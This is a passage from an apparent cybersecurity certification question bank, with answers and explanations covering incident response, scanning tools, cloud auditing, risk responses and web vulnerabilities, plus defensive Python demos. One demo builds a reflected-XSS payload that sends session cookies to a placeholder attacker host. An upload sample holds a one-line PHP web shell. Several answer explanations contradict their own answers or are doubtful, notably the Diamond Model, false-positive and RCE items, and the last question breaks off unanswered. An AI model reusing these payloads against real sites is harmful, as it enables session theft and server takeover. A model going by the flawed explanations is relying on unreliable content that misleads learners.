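    "aa:bb:cc:00:00:02": "printer-2f",
    "aa:bb:cc:00:00:03": "ws-alice",
}

# Constructed passive capture: what a sniffer on a SPAN port would log without sending anything.
PASSIVE_LOG = """\
2024-05-01T09:00:01Z ARP 10.0.0.10 is-at aa:bb:cc:00:00:01
2024-05-01T09:00:04Z ARP 10.0.0.20 is-at aa:bb:cc:00:00:02
2024-05-01T09:01:10Z DHCP lease 10.0.0.77 to 12:34:56:78:9a:bc
2024-05-01T09:02:30Z ARP 10.0.0.31 is-at aa:bb:cc:00:00:03
2024-05-01T09:03:00Z ARP 10.0.0.99 is-at de:ad:be:ef:00:01
"""

# Constructed active-sweep result: addresses that answered a ping/ARP sweep.
ACTIVE_RESPONDERS = {"10.0.0.10", "10.0.0.20", "10.0.0.31", "10.0.0.99"}

LINE_RE = re.compile(
    r"^\S+ (?:ARP (?P<ip_a>[\d.]+) is-at (?P<mac_a>[0-9a-f:]{17})"
    r"|DHCP lease (?P<ip_d>[\d.]+) to (?P<mac_d>[0-9a-f:]{17}))$"
)


def observe_passively(log: str) -> dict:
    """Return {ip: mac} learned purely by listening; malformed lines are skipped."""
    seen = {}
    for line in log.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        ip = match.group("ip_a") or match.group("ip_d")
        mac = match.group("mac_a") or match.group("mac_d")
        seen[ip] = mac.lower()
    return seen


def find_rogues(passive: dict, active: set, inventory: dict) -> dict:
    """Correlate passive and active results against the inventory."""
    # Seen talking on the wire with a MAC nobody has recorded: the classic rogue.
    unknown_mac = {ip: mac for ip, mac in passive.items() if mac not in inventory}
    # Answered the sweep but never observed passively: no MAC to check, still unexpected.
    unexplained_active = sorted(active - set(passive))
    # Observed passively but silent to the sweep: host-firewalled, or only briefly online.
    # Active scanning alone would have missed these entirely.
    silent = sorted(ip for ip in passive if ip not in active)
    return {
        "unknown_mac": unknown_mac,
        "unexplained_active": unexplained_active,
        "silent": silent,
    }


if __name__ == "__main__":
    passive = observe_passively(PASSIVE_LOG)
    for category, hits in find_rogues(passive, ACTIVE_RESPONDERS, INVENTORY).items():
        print(f"{category}: {hits}")
```

On the constructed data, 10.0.0.99 is flagged by both methods, while 10.0.0.77 shows up only in the passive capture: it took a DHCP lease but did not answer the sweep, which is exactly the case that makes passive scanning worth running alongside the active one.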

A mid-sized company wants to incorporate e-commerce to improve sales. The company has decided to hire an information security consultant to assist in bolstering security measures in preparation for the company's new changes. The consultant focused on the potential risk associated with storing and processing bank information. What information security standard is the consultant concentrating efforts on? A. NIST Cybersecurity Framework (CSF) B. International Organization for Standardization (ISO) 27000 series C. Payment Card Industry Data Security Standard (PCI DSS) D. General Data Protection Regulation (GDPR)

C. Payment Card Industry Data Security Standard (PCI DSS) The Payment Card Industry Data Security Standard (PCI DSS) requires companies that handle, process, or store cardholder data to do so securely. Because the consultant is focused on the risk of storing and processing payment information, PCI DSS is the standard that most directly governs the company's move into e-commerce.

The security operations center (SOC) manager has ordered an analyst to fingerprint some of a new client's systems. Which of the following aligns most with performing fingerprinting as the SOC manager requested? A. Perform a set of processes on how much information can be extracted from delivered software B. Perform a scan identifying devices connected to a network or network segment C. Perform a scan looking to focus attention on individual devices to better understand their purpose D. Perform a scan identifying and assessing the vulnerabilities that malicious attackers can exploit on/in the systems

C. Perform a scan looking to focus attention on individual devices to better understand their purpose Device fingerprinting describes the effort taken to identify details about a device more precisely. While a map or discovery scan looks for connected devices, a fingerprint scan focuses attention on an individual device.

A company conducted a web vulnerability assessment on its web applications and identified several security issues. The company now needs suitable techniques to analyze the assessment output to respond to potential threats and indicators of compromise (IoC). Which techniques would most effectively analyze web vulnerability assessment output in detecting IoCs? A. Implementing network segmentation B. Deploying a web application firewall (WAF) C. Performing data and log analysis D. Using a security information and event management (SIEM) solution

C. Performing data and log analysis Data and log analysis are effective for analyzing web vulnerability assessment output. Reviewing logs and system data helps identify patterns and anomalies that may indicate IoCs, enabling the organization to respond appropriately to potential threats.

A cybersecurity professional has identified a potential security incident that involves sensitive data. To effectively communicate with the legal department and protect the organization's interests, which of the following actions should the professional prioritize when dealing with the data in question? A. Encrypt all sensitive data and distribute it to key stakeholders for review B. Require all team members to sign non-disclosure agreements (NDAs) before accessing the data C. Place a legal hold on the relevant data and inform the legal department D. Conduct an internal investigation without informing the legal department

C. Place a legal hold on the relevant data and inform the legal department A legal hold ensures the organization preserves sensitive data for potential legal proceedings. Informing the legal department allows them to take appropriate actions and maintain effective communication throughout the process.

An organization is improving its incident response plan to ensure its cybersecurity team can efficiently handle security incidents. They decide to develop playbooks to guide the team's actions during various types of incidents. How can incorporating playbooks into the incident response plan help the organization maintain operational visibility during a security event? A. Facilitate clear communication among team members using playbooks B. Ensure proper documentation of incident handling processes C. Provide step-by-step instructions to address specific incidents D. Enable faster incident identification and containment

C. Provide step-by-step instructions to address specific incidents Incorporating playbooks into the incident response plan helps maintain operational visibility during a security event by providing step-by-step instructions that allow the cybersecurity team to handle various types of incidents efficiently.

A cloud administrator has to perform regulatory compliance checks on a legal office's cloud instances and evaluate the office's cloud infrastructure against the Center for Internet Security (CIS) Benchmarks for Amazon Web Services (AWS). Which of the following tools would the administrator most likely use to easily carry out the tasks? A. Pacu B. ScoutSuite C. Prowler D. Metasploit Framework

C. Prowler Prowler is an open-source security audit tool originally built for AWS. It can evaluate a cloud infrastructure against the CIS Benchmarks for AWS and perform regulatory compliance checks. Pacu is an AWS exploitation framework and Metasploit is a general exploitation framework; neither is an audit tool. ScoutSuite is a multi-cloud audit tool but is not the one organized around the CIS AWS Benchmark and compliance checks.

A company's website allows users to upload files stored on the server for other users to download. An attacker uploads a specially crafted file that contains malicious code, and the server does not properly validate the file. As a result, when other users download the file, the malicious code gets executed on their system. What type of vulnerability does this situation describe? A. XSS B. CSRF C. RCE D. SSRF

C. RCE Remote code execution (RCE) is a security vulnerability where an attacker remotely executes arbitrary code or commands on a targeted system or application, allowing unauthorized system access or use.
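The missing control in the scenario is server-side validation of what was uploaded. The following added example (not part of the original question set) shows the checks a practitioner would put in front of an upload handler: an extension allowlist, a content check against the file type's leading bytes, stripping any path the client smuggles into the filename, and a server-chosen storage name so the client's name never reaches the filesystem. The allowlist, size limit, and sample uploads are constructed for the example.

```python
import hashlib
import re

# Constructed allowlist: extension -> leading bytes the content must start with.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
MAX_BYTES = 5 * 1024 * 1024          # assumed size limit for the example
SAFE_EXT = re.compile(r"^[a-z0-9]{1,5}$")


def validate_upload(filename: str, data: bytes):
    """Return (accepted, detail). Decisions rest on the bytes, not on client claims."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    # Strip any directory component the client sent (".." tricks, absolute paths, backslashes).
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()     # only the LAST extension counts
    if not SAFE_EXT.match(ext) or ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, ext


def storage_name(data: bytes, ext: str) -> str:
    """Server-chosen name derived from content; identical uploads collapse to one file."""
    return f"{hashlib.sha256(data).hexdigest()}.{ext}"


# Constructed sample uploads: (client-supplied name, bytes).
SAMPLES = [
    ("report.pdf", b"%PDF-1.7\n%constructed sample\n"),
    ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("shell.php", b"<?php system($_GET['c']); ?>"),          # disallowed extension
    ("cute.png", b"<?php system($_GET['c']); ?>"),           # script disguised as an image
    ("../../var/www/html/x.pdf", b"%PDF-1.4\n"),             # path smuggled in the name
]

if __name__ == "__main__":
    for name, content in SAMPLES:
        ok, detail = validate_upload(name, content)
        if ok:
            print(f"ACCEPT {name!r} -> stored as {storage_name(content, detail)}")
        else:
            print(f"REJECT {name!r}: {detail}")
```

Two points from the run: the disguised-script case fails on content rather than on name, which is the check the scenario's server lacked, and the path-smuggling case is accepted but stored under a hash name in a directory the server controls. Serving uploads back with Content-Disposition: attachment and X-Content-Type-Options: nosniff, from a location where the web server will not execute scripts, closes the remaining gap on the download side.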

An online retailer permits users to search for products on their website. An attacker decides to take advantage of their search feature by injecting a malicious script into the search bar. When a user types in a search query that triggers the injection, it mirrors the script back to the user's browser and executes it, allowing the attacker to steal the user's session token. What type of attack is this? A. Persistent XSS B. Directory traversal C. Reflected XSS D. File inclusion

C. Reflected XSS The attacker is using reflected cross-site scripting (XSS) to steal the user's session token. In reflected XSS, the malicious script travels in the request (typically embedded in a URL parameter), is reflected back by the web application in its response, and executes in the victim's browser. It is not stored by the application, which distinguishes it from persistent XSS.
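The following added example (not part of the original question set) walks through the scenario end to end in plain Python: it builds the attack URL, shows how the search page reflects the parameter into two HTML contexts (element body and attribute value), and places a vulnerable renderer next to its hardened form. The payload, hostnames, and page template are constructed; the hardened version relies on html.escape from the standard library.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed payload: exfiltrate document.cookie to an attacker-controlled host.
PAYLOAD = '<script>location="http://attacker.invalid/?c="+document.cookie</script>'


def attack_url(base: str = "http://shop.example/search") -> str:
    """The link the attacker sends to the victim; the script rides in the q parameter."""
    return f"{base}?{urlencode({'q': PAYLOAD})}"


def query_from_url(url: str) -> str:
    """What the server sees after decoding the request."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    """Reflects user input straight into the page: element body AND attribute value."""
    return f'<h1>Results for {q}</h1>\n<input name="q" value="{q}">'


def render_hardened(q: str) -> str:
    """Same page, with output encoding. quote=True also escapes \" and ' so the
    attribute context cannot be broken out of."""
    safe = html.escape(q, quote=True)
    return f'<h1>Results for {safe}</h1>\n<input name="q" value="{safe}">'


def reflects_script(page: str) -> bool:
    """Crude check: does a live <script tag appear in the rendered page?"""
    return "<script" in page.lower()


def breaks_attribute(page: str) -> bool:
    """Would the input close the value="..." attribute early?"""
    return 'value="' in page and page.split('value="', 1)[1].count('"') > 1


if __name__ == "__main__":
    url = attack_url()
    q = query_from_url(url)
    print("attacker sends:", url)
    for name, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = renderer(q)
        print(f"\n[{name}] script executes: {reflects_script(page)}; "
              f"attribute broken: {breaks_attribute(page)}\n{page}")
```

Output encoding for the context you are writing into is the fix; marking the session cookie HttpOnly limits what a successful injection can steal, but it does not stop the script from running, so it is a second layer rather than a substitute.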

An information security manager is creating a compliance report that will include data on policies and procedures, audit results, employee training, and gap analysis. What is the company promising to follow? A. Security baselines B. Sensitivity levels C. Regulatory requirements D. Operations

C. Regulatory requirements Compliance reports are mandated by laws, regulations, contracts, or internal policies, and the content the manager is assembling (policies and procedures, audit results, training records, and a gap analysis) is evidence that the company is meeting those obligations. The report is the company's statement that it is following the regulatory requirements that apply to it.

The "intruder" feature of the Burp Suite can provide an output of vulnerable elements on a web page displayed on the suite's integrated browser. Using default settings, how can an administrator quickly identify which login page elements, for example, are potentially vulnerable? A. Review items in the history tab B. Review items in the issues section C. Review items highlighted in green D. Review the last item listed on the command line window

C. Review items highlighted in green The Burp Suite tool's "intruder" tab provides a section for payload positions that can reveal vulnerable elements of a page highlighted in green.

The chief information security officer (CISO) for a large pharmaceutical corporation receives a report that a hacktivist has vandalized one of the company's web servers due to an authentication flaw at the server level. As an organizational leader working to prevent future incidents, what should be the CISO's top priority? A. Identifying the attacker's network details and then launching a counterattack to prevent further compromise B. Notifying upper management and pre-emptively releasing a statement to prevent damage to the company's reputation C. Reviewing the company's service-level objectives and incident response plan to ensure that they are in keeping with industry best practices D. Analyzing the extent of the damage and restoring the server to its original state

C. Reviewing the company's service-level objectives and incident response plan to ensure that they are in keeping with industry best practices Service-level objectives (SLOs) provide a benchmark by which security operations can measure their performance and help ensure they meet leadership's expectations. Service-level objectives must be measurable, achievable, and realistic, like any goal-setting initiative. A CISO works at the level of service-level objectives, so reviewing the current SLOs constitutes a suitable answer to prevent future incidents.

A financial institution considers partnering with a new vendor to provide online payment services to its customers. The vendor has a reputation for delivering reliable and secure services; however, the financial institution wants to ensure that they make an informed decision. What metric could the institution use to assess the security risk associated with this partnership? A. Recurrence of attacks against the vendor B. Mitigations required from previous attacks C. Risk score D. Affected hosts

C. Risk score The risk score estimates the impact and likelihood of a threat actor exploiting a vulnerability before an attack. It is suitable for estimating the probability of issues with a vendor.

A large organization recently suffered a significant cyberattack that disrupted daily operations. The management team is reviewing the incident and wants to improve its business continuity and disaster recovery strategies, with a focus on patch management concepts. Which patch management best practices should the organization execute to increase its BC/DR preparedness? A. Centralized patch management system B. Updates prioritized by vendor suggestions C. Risk-based prioritization of patches D. Integration of patch management with change management processes

C. Risk-based prioritization of patches A risk-based approach to patch prioritization helps ensure that the organization addresses the most critical vulnerabilities first, reducing the overall risk and improving the organization's resilience to cyberattacks or other disasters.

An analyst working for a financial institution has implemented both security orchestration, automation, and response (SOAR) and security information and event management (SIEM) solutions to enhance their security posture. The analyst receives an alert from the SIEM solution about a potential security threat, and the SOAR solution is triggered to respond to the incident. What is the key difference between SOAR and SIEM solutions in a security operations environment, as shown in the scenario above? A. SOAR solutions are for network traffic monitoring, while SIEM solutions are for incident response. B. SOAR solutions are for threat intelligence analysis, while SIEM solutions are for vulnerability assessment. C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. D. SOAR solutions are for user authentication, while SIEM solutions are for data encryption.

C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. The security information and event management (SIEM) solution alerts the analyst of a potential security threat, while the security orchestration, automation, and response (SOAR) solution responds to the incident. The key difference between SOAR and SIEM solutions is that SOAR solutions are for automating incident response, while SIEM solutions are for collecting and analyzing security data.

A home furniture company has tasked a cybersecurity analyst to conduct an assessment of their deep-packet inspection firewall's ability to halt brute-force password attacks across the screened subnet. As they begin their testing, they try to bypass the security control by entering a series of random characters into the password field. What is the analyst attempting to do? A. Adversary emulation B. Threat modeling C. Security control testing D. Attack surface reduction

C. Security control testing Performing security control testing to ensure controls are working correctly is crucial. However, the security analyst is testing a specific control, not completing a comprehensive test against a network.

A human resources outsourcing company considers outsourcing its IT infrastructure to a cloud service provider. The company is concerned about the potential for downtime and its impact on its business. What is the best way to mitigate the risk of downtime? A. Organizational governance B. Configuration management C. Service-level agreement (SLA) D. Memorandum of understanding (MoU)

C. Service-level agreement (SLA) A service-level agreement (SLA) is a legally binding contract between two or more parties that defines the level of service and governs the relationship with a third-party service provider. An SLA is the right instrument for guaranteeing a level of uptime because it sets a measurable availability target and the remedies that apply if the provider misses it.

When using the Metasploit web interface for brute force exploits, what can a security administrator review to determine the number of compromised targets in the attack and whether the target shows a "Failed" or "Succeeded" result? A. Web detect section B. Task log section C. Statistics section D. Repeater section

C. Statistics section The statistics section of the brute force module can track real-time information regarding the total number of login attempts, compromised targets, and even successful logins.

The IT department of a company has identified significant risks to a critical piece of business software. There are no available controls to alleviate the software's vulnerability, but the business will lose all revenue sources without this software. What is the best course of action? A. Take no further action as the software is critical to operations B. Uninstall the vulnerable software to prevent exploitation C. Submit a formal request for a risk management exception D. Mitigate the vulnerability

C. Submit a formal request for a risk management exception A risk management exception is a formal process that permits an organization to acknowledge non-compliance with security policies or standards to allow an activity to occur. Risk management exceptions are suitable for critical business processes with no available controls.

Which security control category do systems primarily implement? A. Preventative B. Managerial C. Technical D. Operational

C. Technical A system (hardware, software, or firmware) implements technical controls (a control category). For example, firewalls, antivirus software, and operating system (OS) access control models are technical controls. Technical controls are also known as logical controls.

A golf services company is planning to implement a critical security patch to address a known vulnerability in their bookings system. What is the best way to ensure that the patch does not cause any unintended consequences or disruptions to the system? A. Rollback B. Implementation C. Testing D. Validation

C. Testing Patch testing evaluates patches or configuration changes on a test system or environment to ensure they do not cause unintended consequences or disruptions.

A company's IT security team discovers that one of their servers is experiencing a significant increase in drive capacity consumption. Upon investigating, the team identifies several malicious processes running in the background. Which of the following best explains the relationship between drive capacity consumption and malicious processes in this scenario? A. The server's drive capacity consumption is causing the malicious processes to run in the background, potentially due to insufficient storage space. B. The malicious processes and the increased drive capacity consumption are unrelated, and the issue could be caused by a hardware failure. C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. D. The server's operating system is corrupted, causing both the increased drive capacity consumption and the malicious processes to occur.

C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. Malware commonly stages collected data on local disk, often in compressed or encrypted archives, before sending it out, so an unexplained jump in drive consumption that coincides with unknown processes is a recognized host indicator of compromise. The processes are the cause and the disk growth is the symptom, not the other way around.

A cyber security team is in the process of correlating threat data from network logs, endpoints, and intelligence feeds. Which of the following best describes the actions they are undertaking? A. Data enrichment B. Essential strategy C. Threat feed combination D. Preemptive actions

C. Threat feed combination Threat feed combination refers to the process of collecting and merging multiple sources of threat intelligence feeds into a unified view.

Which of the following are true about the importance of time synchronization, configuration file locations, and logging files in security operations? (Select the two best options.) A. Configuration file locations are typically easy to find and are consistent across different operating systems. B. Time synchronization is only important for Windows-based operating systems. C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents.

C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents. Time synchronization is important because it ensures that events are recorded in the correct order across all systems and devices, which is critical for forensic analysis of security incidents. Logging files can provide important information for identifying and investigating security incidents, including information on system and user activity, network traffic, and more.

What is the main purpose of a memorandum of understanding (MoU)? A. To outline the services provided by a third-party service provider B. To legally bind two or more parties to an agreement C. To ensure all parties involved in an agreement understand each other's expectations and obligations D. To protect both parties involved in a service-level agreement

C. To ensure all parties involved in an agreement understand each other's expectations and obligations A memorandum of understanding (MoU) is a legal document that outlines the terms and conditions of an agreement between two or more parties.

A security analyst is researching an incident that has affected their organization's web server. The analyst must understand the attacker's tactics, techniques, and procedures (TTPs) to prevent future incidents. Which of the following should the analyst prioritize to study and apply attack methodology frameworks effectively? A. Implementing a business continuity (BC)/disaster recovery (DR) plan B. Conducting security awareness training C. Utilizing threat intelligence tools D. Performing root cause analysis

C. Utilizing threat intelligence tools Threat intelligence tools help the security analyst collect and analyze data related to attack methodologies, TTPs, and threat actors.

When trying to exploit an Amazon Web Services (AWS) account using the Pacu exploitation tool, the security administrator receives the following line: Found role: arn:aws:iam::896747040350:role/Admin. Which of the following modules is the security administrator running at this time? A. exploit/windows/ssh/sysax_ssh_username B. iam_enum_permissions C. iam_enum_roles D. recon/domains-contacts/whois_pocs

C. iam_enum_roles The security administrator is running the iam_enum_roles module, which remotely discovers roles based on a dictionary attack using the Pacu exploitation tool. The exploit is successful if the tool finds one or more roles.

A new supervisor tasked a cybersecurity analyst with implementing a solution that includes a set of protocols and tools for building software applications that enables them to communicate with other applications, platforms, or services. What task has the supervisor assigned to the cybersecurity analyst to implement? A. Plugins B. Webhooks C. SDN D. APIs

D. APIs Application programming interfaces (APIs) are a set of protocols and tools that allow software applications to communicate with each other. APIs enable developers to build applications that can access and use the functionality of other applications, platforms, or services.

An external security team was able to gain a session token to one of the user accounts to carry out other vulnerability tests on an AWS account almost immediately after using the Pacu security tool. As a result, the team could continue their work for about an hour uninterrupted. Which of the following best describes the most alarming conclusion from this security test case? A. The web IAM dashboard shows findings. B. Domain POCs is publicly known. C. Public entities are easily mapped for social engineering. D. Access was granted without knowing passwords.

D. Access was granted without knowing passwords. The Pacu tool's iam_enum_roles module remotely discovers roles based on a dictionary attack. Obtaining the session token in this case indicates that the accounts have dictionary passwords and are easy targets for threat actors.

A company has hired a red team to simulate the tactics, techniques, and procedures of APT 1337, a Malaysian profit-focused hacker syndicate, against their network. As they attempt to gain access to the company's systems, they use APT 1337's signature combination of social engineering techniques, data protection bypasses, and technical exploits to bypass security controls. What activity is the red team conducting? A. Penetration testing B. Security control testing C. Output encoding D. Adversary emulation

D. Adversary emulation Adversary emulation involves simulating a real-world cyber attack by an actual adversary to assess an organization's defenses.

A soap product conglomerate's security system generates a large number of Security Information and Event Management (SIEM) notifications to administrators within a short period. What metric does this refer to? A. Mean time to detect B. Mean time to respond C. Mean time to remediate D. Alert volume

D. Alert volume Alert volume is the number of security alerts a system or tool generates over a specified period. Security Information and Event Management (SIEM) notifications to administrators are synonymous with alerts.

A security analyst at a software development company must identify network threats. They recently discovered a misconfigured server. What should the analyst focus on to secure network and system architecture? A. Implementing industry best practices B. Monitoring network traffic C. Investigating physical security measures D. Assessing attack stage and web application vulnerabilities

D. Assessing attack stage and web application vulnerabilities The analyst should prioritize understanding if an attacker has exploited the misconfigured server, determining the possible attack stage, and evaluating web application vulnerabilities. This focus aligns with the objectives of the cyber kill chain model and the Open Web Application Security Project (OWASP) Testing Guide.

A transport network company that provides private taxi cab services has a web application that allows customers to schedule appointments with their driver. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. The company decides to discontinue using this software given the risks that it entails, instead electing to run tasks manually using Excel spreadsheets. What kind of risk response does this represent? A. Mitigation B. Acceptance C. Transference D. Avoidance

D. Avoidance Risk avoidance often refers to stopping an activity that is risk-bearing. For instance, a private cab service may stop offering a route to a dangerous neighborhood if it continues experiencing violent crime. Avoidance is suitable when the activity is unnecessary, or the risk is too great.

The solutions architect is in charge of assembling the initial security configuration of various systems on the network, such as Mac, Windows, UNIX, and Linux. Where would the architect look for configuration guidelines to cover these different systems? A. Open Web Application Security Project (OWASP) B. International Organization for Standardization (ISO) 27000 series C. Cloud Security Alliance (CSA) D. Center for Internet Security (CIS) benchmarks

D. Center for Internet Security (CIS) benchmarks The Center for Internet Security (CIS) benchmarks provide a secure baseline configuration for various operating systems, applications, and hardware devices. The CIS Benchmark is a broad set of over 100 configuration guidelines covering different aspects of IT security.

When using the Angry IP Scanner, how would a network security officer determine if a number of devices on the network are accessible via TELNET? A. Check IP address range B. Check description in visualization tool C. Check for web detect D. Check for port 23

D. Check for port 23 TELNET uses transmission control protocol/internet protocol (TCP/IP) port 23. The security officer searches for all devices in the tool with port 23 listed to determine which devices have a TELNET port open.

A company has implemented a new security control requiring employees to use two-factor authentication to log in to their workstations. However, many employees are experiencing difficulty using the new authentication process, affecting productivity. What type of controls should the company consider implementing to address this issue? A. Preventative B. Technical C. Managerial D. Compensating

D. Compensating Compensating controls serve as a substitute for a principal control, offering the same or better level of protection compared to a principal control. The implemented principal control is not working well, making compensating controls the best answer.

A multinational corporation wants to enhance its incident response capabilities and ensure continuous improvement in the process. What should the security operations center (SOC) focus on to achieve this objective? A. Reviewing playbooks B. Conducting security training C. Implementing a threat intelligence program D. Conducting post-incident reviews

D. Conducting post-incident reviews Post-incident reviews involve analyzing the incident response process, identifying areas of improvement, and implementing changes to enhance the team's effectiveness in handling future incidents.

A multinational corporation has tasked a security analyst with improving the organization's incident response capabilities. What should the analyst focus on to best enhance the team's ability to respond to security incidents? A. Developing playbooks B. Performing regular vulnerability scans C. Implementing security awareness training D. Conducting tabletop exercises

D. Conducting tabletop exercises Tabletop exercises help the incident response team practice and evaluate their response to simulated incidents, enhancing their preparedness and response capabilities.

A network security analyst at an organization must enhance the detection of suspicious activity within the organization's network. The analyst considers implementing various techniques to accomplish this goal. What is most effective in helping the analyst identify potential network indicators of compromise? A. Conducting regular employee training sessions B. Deploying a vulnerability scanner tool C. Participating in tabletop exercises D. Continuous network traffic monitoring and analysis

D. Continuous network traffic monitoring and analysis Continuous network traffic monitoring and analysis allows the network security analyst to detect and identify potential indicators of compromise by observing network activity and identifying any unusual patterns or behaviors.

A company is debating alternative methods for vulnerability scans due to the multiple attempts made on the company's network. The attempts have occurred over the previous year. Which of these methods will provide the most comprehensive evaluation of company devices? A. Non-credentialed B. Agent C. Agentless D. Credentialed

D. Credentialed Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes.

A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe? A. Broken access control B. Security misconfiguration C. XSS D. Cryptographic failures

D. Cryptographic failures Cryptographic failures describe vulnerabilities in encryption or cryptographic systems that permit compromising the confidentiality of encrypted data.

A security analyst is evaluating the effectiveness of their organization's incident response process. They need to understand the stages of an attack and have a framework that aids in understanding the relationships between the adversary, infrastructure, and capabilities of the attack. Additionally, the analyst wants to ensure that they properly address vulnerability reporting outcomes and action plans. Which frameworks should the analyst focus on to achieve these objectives? A. Open Source Security Testing Methodology Manual (OSSTMM) B. Cyber kill chain C. MITRE ATT&CK D. Diamond Model of Intrusion Analysis

D. Diamond Model of Intrusion Analysis The cyber kill chain allows the analyst to identify potential weaknesses in their defenses and develop appropriate action plans.

An organization's security team is conducting routine system checks and discovers an unauthorized scheduled task on a critical server. Further investigation reveals that the task is set to run every hour, and the task is not part of any known system or application updates. What is the best course of action for the security team to take in response to the unauthorized scheduled task on the critical server? A. Allow the task to run and gather more information before taking any action B. Immediately shut down the critical server to prevent any further unauthorized access C. Schedule a maintenance window to investigate the task at a later time D. Disable the task and monitor the server for any further suspicious activity

D. Disable the task and monitor the server for any further suspicious activity To prevent any further suspicious activity and protect the critical server, the security team should disable the unauthorized scheduled task.

An analyst reviews an alert detecting a rogue backend server deployed behind the company's load balancer. After the analyst attempts to identify the possible threat, the screened subnet firewall blocks the action. What process was the analyst using to identify where on the network the device was connected? A. Vulnerability scan B. Device fingerprinting C. Dynamic analysis D. Discovery scan

D. Discovery scan A map, or discovery, scan identifies the devices connected to a network or network segment.

Where can a security analyst go on the Arachni web user interface (UI) to load balance the work on scanning multiple URL targets from remote machines? A. Profiles section B. Extender section C. Target section D. Dispatcher's section

D. Dispatcher's section The security analyst goes to the dispatcher's section of Arachni. It allows the analyst to load balance workloads by adding or assigning remote machines to perform the scans.

A security analyst has to review the Amazon Web Service (AWS) compute instances for an organization and report security findings. Where would the analyst find a list of all such findings when using the ScoutSuite auditing tool? A. Recommendation column B. Assessment summary C. IAM dashboard D. EC2 dashboard

D. EC2 dashboard The EC2 dashboard is the appropriate place to find findings for compute instances. AWS EC2 is a compute service on the cloud platform.

A cybersecurity professional needs to address compliance requirements related to data preservation and handling sensitive information during an investigation. Which of the following actions should the professional prioritize to ensure the organization meets these requirements while dealing with the data in question? A. Distribute the data to multiple team members for redundancy purposes B. Store all organizational data on encrypted devices with limited access C. Provide the relevant data to the legal department for immediate action D. Establish a chain of custody and place a legal hold on the relevant data

D. Establish a chain of custody and place a legal hold on the relevant data Establishing a chain of custody ensures proper handling and documentation of sensitive data throughout the investigation. Implementing a legal hold preserves the data for potential legal proceedings, helping the organization comply with the requirements.

A cybersecurity professional must address compliance requirements related to data preservation and handling sensitive information during an investigation. What actions should the professional prioritize? A. Distribute data to multiple team members B. Store data securely with limited access C. Provide relevant data to legal department D. Establish chain of custody and legal hold

D. Establish chain of custody and legal hold Establishing a chain of custody ensures proper handling and documentation of sensitive data throughout the investigation. Implementing a legal hold preserves the data for potential legal proceedings, helping the professional comply with the requirements.

A security analyst encounters a vulnerability relating to a web server at IPv4 address 42.32.59.252. This web server is inside the network's screened subnet, and the vulnerability pertains to an outdated version of a service running on port 443. What type of network vulnerability has the security analyst discovered? A. Internal B. Isolated C. SCADA D. External

D. External External refers to an attack originating from outside a network, generally from the internet. For example, the IPv4 address 42.32.59.252 refers to a public IP address that originates externally.

A security information and event management (SIEM) system flags a failed remote secure shell (SSH) attempt as suspicious and alerts the security team. Upon investigation, the team determines that the SSH attempt is from a legitimate source. What is the type of error in this situation? A. True positive B. False negative C. True negative D. False positive

D. False positive False positives occur when a vulnerability scan incorrectly indicates that a vulnerability or misconfiguration is present when it is not. Identifying and managing false positives is important to reduce the time spent researching and validating them and to increase the accuracy of scan results.

An attacker knows that a web application's credentials database stores passwords as CRC hashes. The attacker then uses a rainbow table of all CRC hashes to assist in a hash collision attack, causing identical hashes that facilitate access without needing to know the victim's actual password. What vulnerability has caused this situation? A. Broken access control B. Software and data integrity failures C. Cryptographic failures D. Identification and authentication failures

D. Identification and authentication failures Identification and authentication failures are security vulnerabilities where systems or applications fail to properly verify user identity, allowing unauthorized access. This failure can result from weak or easily guessable passwords, lack of multifactor authentication, or insufficient verification of credentials. Cyclic redundancy check (CRC) hashes are weak, making this an authentication failure.

To enhance the security of a software company, a cybersecurity analyst is tasked with devising a new patch management process. The analyst must conduct a thorough analysis in response to a recent cyber attack on the company's network. When working on the patch management plan, what should the analyst prioritize? A. Tracing attacker infrastructure B. Assessing attacker skills C. Analyzing victim traits D. Identifying and prioritizing vulnerabilities

D. Identifying and prioritizing vulnerabilities When implementing a patch management process, the primary objective is identifying and prioritizing vulnerabilities in the organization's software and systems. Following the OWASP Testing Guide, the analyst can ensure that the patch management process aligns with industry best practices and helps improve the organization's security posture.

The company's login page needs testing after their cyber security engineer implemented hardening techniques. As a result, its penetration testing team assigned the website specialist to perform some tests to ensure the changes were stable. What specifically is the specialist attempting when using fuzzing tools to perform the tests? A. Extracting source code, and identifying software methods and languages used B. Focusing attention on the individual webserver to better understand its purpose towards the website C. Retrieving data and inspecting source code to identify vulnerabilities in programming techniques, via static analysis D. Identifying problems and issues with the webpage by purposely inputting or injecting malformed data

D. Identifying problems and issues with the webpage by purposely inputting or injecting malformed data A fuzzer is a tool that automatically generates and injects malformed data. The specialist is using the tool to identify problems and issues with an application by purposely inputting or injecting malformed data.

A large corporation is facing legal action due to a recent data breach. The corporation must preserve relevant digital evidence and maintain the chain of custody as part of the ongoing investigation. The corporation considers implementing identity and access management (IAM) solutions to improve its security posture. Which IAM practice would also contribute to preserving the chain of custody during the corporation's legal hold period? A. Use single sign-on (SSO) technology B. Enable multi-factor authentication (MFA) C. Perform regular password audits D. Implement a role-based access control system

